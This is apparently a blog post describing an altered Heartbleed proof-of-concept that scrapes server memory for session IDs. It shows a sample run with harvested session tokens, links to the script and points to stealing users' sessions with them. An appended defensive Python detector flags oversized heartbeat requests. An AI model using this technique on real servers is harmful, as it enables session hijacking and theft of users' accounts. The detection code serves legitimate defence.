Edit: Many people have commented on the fact that this would very likely land you in prison if you were to use it on unauthorized servers. This and any other exploit code you use on servers that you do not own is very much against the law. This code is for educational purposes only, and I take no responsibility for you doing something stupid with it.
If you have been living under a rock recently, Heartbleed is a bug in OpenSSL that allows anyone on the internet to read sections of memory on vulnerable servers.
Matthew Sullivan posted a blog post earlier today about using CVE-2014-0160 to hijack user sessions from vulnerable servers. I altered the proof-of-concept code written by Jared Stafford to continuously query a given server for memory chunks and parse those chunks for session IDs.
Some very simple checks are in place to only spit out unique session IDs. You can check out Sullivan’s blog post to see how these session IDs can be inserted into a web browser to steal those users' sessions.
    ➜ ~ ./heartbleed-altered.py your_server.com session
    session=1395650268
    session=1552654927
    session=9074328142
    session=1584630615
    session=1399867484
    session=1570915943
    session=6442471150
    session=1134475661
    session=1828846521
    session=1025417958
    session=1429746458
    session=9503698952
    session=3413620908
    session=5569288762
    session=3669059145
    session=1624974555
    session=1070329834
    session=1747925477
    session=1129670396
    session=1017137517
    session=2331559646
The altered script is available at https://gist.github.com/mpdavis/10171593
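Seen from the server side, continuous querying like this leaves a recognizable pattern: heartbeat requests whose claimed payload length does not fit inside the TLS record that carries them (the bounds check RFC 6520 requires). The detector below is an added example, not part of the original post or the linked script. It assumes the heartbeat records are captured unencrypted, and the function names, sample flows and threshold are illustrative.

```python
import struct
from collections import Counter

HEARTBEAT = 24      # TLS ContentType for heartbeat (RFC 6520)
HB_REQUEST = 1      # HeartbeatMessageType heartbeat_request
MIN_PADDING = 16    # RFC 6520 minimum padding length

def iter_records(stream: bytes):
    """Yield (content_type, fragment) for each complete TLS record in stream."""
    off = 0
    while off + 5 <= len(stream):
        ctype, _version, length = struct.unpack_from("!BHH", stream, off)
        frag = stream[off + 5: off + 5 + length]
        if len(frag) < length:      # truncated capture: stop parsing
            return
        yield ctype, frag
        off += 5 + length

def overread_claims(stream: bytes):
    """Return the claimed lengths of heartbeat requests that exceed their record."""
    hits = []
    for ctype, frag in iter_records(stream):
        if ctype != HEARTBEAT or len(frag) < 3:
            continue
        hb_type, claimed = struct.unpack_from("!BH", frag)
        # type(1) + length(2) + payload + padding(>=16) must fit in the record
        if hb_type == HB_REQUEST and 1 + 2 + claimed + MIN_PADDING > len(frag):
            hits.append(claimed)
    return hits

def flag_sources(flows, threshold=3):
    """flows: (src_ip, client_bytes) pairs. Return sources at or over threshold."""
    counts = Counter()
    for src, data in flows:
        counts[src] += len(overread_claims(data))
    return {src: n for src, n in counts.items() if n >= threshold}

def record(ctype, frag):
    """Wrap a fragment in a TLS 1.1 record header (helper for the sample data)."""
    return struct.pack("!BHH", ctype, 0x0302, len(frag)) + frag

# Constructed sample data (documentation IP ranges, not real traffic)
WELL_FORMED = record(HEARTBEAT, struct.pack("!BH", 1, 4) + b"ping" + b"\x00" * 16)
MALFORMED = record(HEARTBEAT, struct.pack("!BH", 1, 0x4000))
SAMPLE_FLOWS = [("192.0.2.10", MALFORMED * 5), ("198.51.100.7", WELL_FORMED * 5)]

if __name__ == "__main__":
    print(flag_sources(SAMPLE_FLOWS))
```

A source that trips this check has most likely received server memory, so every session that was active on the affected server should be invalidated once OpenSSL is patched.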